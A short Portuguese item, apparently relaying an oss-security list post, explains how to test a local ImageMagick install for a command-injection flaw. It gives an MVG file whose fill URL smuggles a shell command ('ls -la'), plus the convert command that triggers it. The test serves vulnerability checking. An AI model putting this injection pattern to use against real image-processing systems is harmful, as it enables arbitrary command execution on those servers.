Karim Valiev postou informações na lista de discussão oss-security, mostrando como verificar a instalação local do ImageMagick para ver se está vulnerável.
Crie um arquivo chamado exploit.mvg com o seguinte conteúdo:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
Em seguida, execute o utilitário de conversão:
$ convert exploit.mvg out.png
Se você vir uma listagem de diretório local, sua instalação do ImageMagick não é não suficientemente protegida.